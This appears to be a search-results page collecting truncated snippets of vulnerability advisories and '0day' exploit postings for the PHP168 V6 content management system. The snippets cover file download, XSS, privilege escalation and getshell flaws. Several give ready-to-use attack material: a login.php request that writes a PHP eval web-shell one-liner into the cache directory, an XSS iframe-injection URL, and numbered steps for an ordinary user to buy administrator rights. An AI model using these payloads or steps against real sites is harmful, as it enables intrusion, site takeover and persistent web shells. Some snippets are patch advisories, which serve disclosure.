65 matches found
PHP168 V6.02 a tasteless hole - vulnerability and early warning - the black bar safety net
Today I inadvertently found a bug in PHP168 V6.02. It is almost the same in nature as the job download-any-file issue, only this time it takes an arbitrary file and then copies a jpg out of it! Proof path attached! Picture. The vulnerable file is "do/cutimg.php": <?php require(dirname(__FILE__)."/"."global.php");...
PHP168 V6 arbitrary file download vulnerability - vulnerability warning - the black bar safety net
Vulnerable file: download.php Vulnerability related to the file HASH b912249a22b630c04f7ad65f8ba5a2f6 download.php $url=base64_decode($url); //2 line 7 $fileurl=str_replace($webdbwwwurl,"",$url); if(eregi(".php$",$fileurl) && is_file(PHP168PATH."$fileurl")) //check whether the file is a php file; if it is php, and...
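PHP168 V6.01 privilege escalation vulnerability
The PHP168 whole-site system is currently the most powerful site-building system in the PHP field. The code is fully open source, secondary development is extremely convenient, all functional modules can be freely installed and removed, and it is completely free for individual users. HPCMS V6.01 has a serious security problem. PHP168 V6.01 Vendor patch: PHP168 -------- The vendor has already provided a patch or upgrade; we recommend that users of this software keep an eye on the vendor's home page to obtain the latest version: http://www.php168.net/ Register an account and enter the member center. Visit http://ssvdb.com/member/buygroup.php?job=buy&gid=3 and you will see the following text. ...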
php168 buy get administrator privileges 0day - vulnerability warning - the black bar safety net
The exploit: 1. Register a normal user. 2. Via http://site/buygroup.php?job=buy&gid=3 purchase administrator privileges. 3. The background that 2webshell...
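PHP168 V6.02 form.php has a cross-site scripting vulnerability
The PHP168 whole-site system is currently the most powerful site-building system in the PHP field. The code is fully open source, secondary development is extremely convenient, all functional modules can be freely installed and removed, and it is completely free for individual users. Insufficient filtering in the form.php page leads to a cross-site scripting vulnerability. PHP168 V6.0220100504 Vendor patch: PHP168 -------- The vendor has not yet provided a patch or upgrade; we recommend that users of this software keep an eye on the vendor's home page to obtain the latest version: http://www.php168.net/ http://www.target.com/do/form.php?mid=3"XSS...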
PHP168 V6.02 cross-site vulnerability - vulnerability warning - the black bar safety net
The PHP168 whole-site system is currently the most powerful site-building system in the PHP field; it is fully open source and extremely convenient for secondary development, all modules can be freely installed and removed, and it is completely free for individual users. Test code:...
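PHP168 V6.02 vote.php has a cross-site scripting vulnerability
The PHP168 whole-site system is currently the most powerful site-building system in the PHP field. The code is fully open source, secondary development is extremely convenient, all functional modules can be freely installed and removed, and it is completely free for individual users. Cross-site demo: http://v6.php168.com/do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E PHP168 V6.02 Awaiting patch /do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E...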
php168 get the administrator 0day - vulnerability warning - the black bar safety net
Because the php168 program improperly handles the purchase of user-group permissions, ordinary users can purchase administrator permissions and thereby obtain administrative privileges. The exploit: 1. Register a normal user. 2. By...
php168 v6.0 vulnerability - vulnerability warning - the black bar safety net
php168 v6.0 vulnerability description: Two steps. First, the do/jsarticle.php file: if(!eregi("^hot|com|new|lastview|like|pic$",$type)) die("Type Error"); $FileName=dirname(__FILE__)."/../cache/jsarticlecache/"; if($type=='like') $FileName.=floor($id/3000)."/"; else unset($id); $FileName.="$type$fid$id.php";...
php168v6 getshell 0day - vulnerability warning - the black bar safety net
SEBUG-Appdir: Php168 Published: 2009-12-26 Affected version: php168 v6.0 Vulnerability description: Two steps. First, the do/jsarticle.php file: if(!eregi("^hot|com|new|lastview|like|pic$",$type)) die("Type Error"); $FileName=dirname(__FILE__)."/../cache/jsarticlecache/"; if($type=='like') $FileName.=floor($id/3...
php168 v6.0 get shell vulnerability - vulnerability warning - the black bar safety net
by: mrxhming Two steps. First, the do/jsarticle.php file: if(!eregi("^hot|com|new|lastview|like|pic$",$type)) die("Type Error"); $FileName=dirname(__FILE__)."/../cache/jsarticlecache/"; if($type=='like') $FileName.=floor($id/3000)."/"; else unset($id); $FileName.="$type$fid$id.php"; .................. if!...
PHP168 back end arbitrary file modification vulnerability - vulnerability warning - the black bar safety net
Off-hook to: AkaLz's Blog. PHP168 back end view/modify arbitrary file vulnerability. Affected version: all PHP168 versions with template editing. Vulnerability description: The PHP168 whole-site system is favored by the majority of users; with its strong, stable, secure and flexible, easy to...
PHP168 back end view/modify arbitrary file vulnerability - vulnerability warning - the black bar safety net
Vulnerability information: Affected program: all PHP168 versions with template editing. Author: esnra. Released on: http://www.3hack.com. Conditions for use: permission to enter the back end. Method: go into the function centre, find the style/template settings, select style management! Article from...
PHP168 6.0 - Command Execution
PHP168 6.0 - Command Execution Securitylab.ir Application Info: Name: PHP168 Version: 6.0 Discovered By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=...
PHP168 v6.0 rc
Securitylab.ir Application Info: Name: PHP168 Version: 6.0 Discovered By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=?php20@eval$POSTs;?...
PHP168 6.0 Command Execution
Exploit for unknown platform in category web applications ============================ PHP168 6.0 Command Execution ============================ Application Info: Name: PHP168 Version: 6.0 Discovered By: Securitylab http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=...
PHP168 6.0 - Command Execution
Securitylab.ir Application Info: Name: PHP168 Version: 6.0 Discovered By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=...
PHP168 6.0 Command Execution
Securitylab.ir Application Info: Name: PHP168 Version: 6.0 Discovered By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=...
PHP168 6.0 Command Execution
No description provided by source...
PHP168 6.0 and below: vulnerability and its use - vulnerability and early warning - the black bar safety net
Danger level: high X Affected versions: PHP168 6.0 and below. On the user login page an intruder can construct a special statement that writes a PHP one-liner to the cache directory, thereby obtaining WEBSHELL permissions on websites that use the PHP168 whole-site program. Test...